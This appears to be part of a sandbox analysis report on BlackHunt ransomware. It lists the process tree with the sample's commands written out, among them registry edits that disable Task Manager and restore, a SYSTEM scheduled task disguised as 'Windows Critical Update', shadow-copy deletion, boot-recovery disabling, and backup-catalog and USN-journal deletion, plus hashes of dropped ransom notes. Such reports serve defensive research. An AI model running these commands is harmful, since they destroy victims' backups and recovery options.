                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                3⤵
                                                                  PID:2520
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                2⤵
                                                                  PID:524
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                    3⤵
                                                                      PID:2608
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:472
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                        3⤵
                                                                          PID:1968
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:2944
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:2828
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:2676
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                                3⤵
                                                                                  PID:1932
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:2908
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                    3⤵
                                                                                      PID:1612
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                    2⤵
                                                                                      PID:2984
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                        3⤵
                                                                                          PID:2124
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                        2⤵
                                                                                          PID:2996
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                              PID:2008
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                            2⤵
                                                                                              PID:1160
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                  PID:2140
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                2⤵
                                                                                                  PID:1272
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                    3⤵
                                                                                                      PID:2692
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                    2⤵
                                                                                                      PID:768
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                        3⤵
                                                                                                          PID:2772
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                        2⤵
                                                                                                          PID:1520
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                            3⤵
                                                                                                              PID:3036
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe" /F
                                                                                                            2⤵
                                                                                                              PID:1660
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe" /F
                                                                                                                3⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:1656
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                              2⤵
                                                                                                                PID:588
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                  3⤵
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:2740
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                2⤵
                                                                                                                  PID:2812
                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                    3⤵
                                                                                                                    • Enumerates connected drives
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:2480
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                  2⤵
                                                                                                                    PID:1652
                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                      3⤵
                                                                                                                      • Interacts with shadow copies
                                                                                                                      PID:3056
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                    2⤵
                                                                                                                      PID:1764
                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                        3⤵
                                                                                                                        • Interacts with shadow copies
                                                                                                                        PID:2664
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                      2⤵
                                                                                                                        PID:2188
                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                          vssadmin.exe Delete Shadows /all /quiet
                                                                                                                          3⤵
                                                                                                                          • Interacts with shadow copies
                                                                                                                          PID:2588
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                        2⤵
                                                                                                                          PID:856
                                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                                            bcdedit /set {default} recoveryenabled No
                                                                                                                            3⤵
                                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                                            PID:712
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                          2⤵
                                                                                                                            PID:1860
                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                              bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                              3⤵
                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                              PID:2316
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                            2⤵
                                                                                                                              PID:2292
                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                fsutil.exe usn deletejournal /D C:
                                                                                                                                3⤵
                                                                                                                                • Deletes NTFS Change Journal
                                                                                                                                PID:1616
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                              2⤵
                                                                                                                                PID:332
                                                                                                                                • C:\Windows\system32\wbadmin.exe
                                                                                                                                  wbadmin.exe delete catalog -quiet
                                                                                                                                  3⤵
                                                                                                                                  • Deletes backup catalog
                                                                                                                                  PID:596
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                2⤵
                                                                                                                                  PID:1788
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                    3⤵
                                                                                                                                      PID:2912
                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2760
                                                                                                                                • C:\Windows\system32\wbengine.exe
                                                                                                                                  "C:\Windows\system32\wbengine.exe"
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1048
                                                                                                                                • C:\Windows\System32\vdsldr.exe
                                                                                                                                  C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:2312
                                                                                                                                  • C:\Windows\System32\vds.exe
                                                                                                                                    C:\Windows\System32\vds.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:2916

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                      Filesize

                                                                                                                                      1KB

                                                                                                                                      MD5

                                                                                                                                      a5fafb1a377a6b6d6179f90bb74704f9

                                                                                                                                      SHA1

                                                                                                                                      20ead481826a4447d6744dc3911a951af6ce6fb9

                                                                                                                                      SHA256

                                                                                                                                      f45cc74c8a2c561707aa6506395aec08f97668040081acf0fa50fcf7bd6c21c8

                                                                                                                                      SHA512

                                                                                                                                      e3baa14a20944eaf062f4487da6459357fbc1c71604eadf0057bf4fe4b91ed841b168a39e9b6633ebe75d3a26ad8958f936929d3cbc553c3d33dcea7fee73d99

                                                                                                                                    • C:\ProgramData\#BlackHunt_ReadMe.txt

                                                                                                                                      Filesize

                                                                                                                                      684B

                                                                                                                                      MD5

                                                                                                                                      3b08ee91f8effa148f10983806de4fdc

                                                                                                                                      SHA1

                                                                                                                                      74e0156e304e4cdfa4bd9aa240824844e2c54cec

                                                                                                                                      SHA256

                                                                                                                                      029706908600a5679d075941c0ab5534f4eb4a2eadc81ad3edc7a7ffc37a3220

                                                                                                                                      SHA512

                                                                                                                                      21818839364c2351fa7dad4405fae044d92e3304a8d5d4b13790bde4f3426da5ea8a733a200c02774d1b1a88002103534ad5ec28dc18a53298ec4034ed4cf90d

                                                                                                                                    • F:\#BlackHunt_ReadMe.hta

                                                                                                                                      Filesize

                                                                                                                                      12KB

                                                                                                                                      MD5

                                                                                                                                      1f288cab0f94ca50e8b2b6c2d7c797eb

                                                                                                                                      SHA1

                                                                                                                                      3877e598d1b0d1948cd767ae1795dbc30ad154f6

                                                                                                                                      SHA256

                                                                                                                                      61ece0ac88c803be3b62d3a731a0bf2ff2b679203c91414ba1a24444cb6cd363

                                                                                                                                      SHA512

                                                                                                                                      cfb48f5e4216ecbe602ccf857459e5a266b74529f06b87f4758784dcfb6fdf389bd7db8f30066723c136bf0a42e43a3a5c227b905444600bac4ea19bb9d73940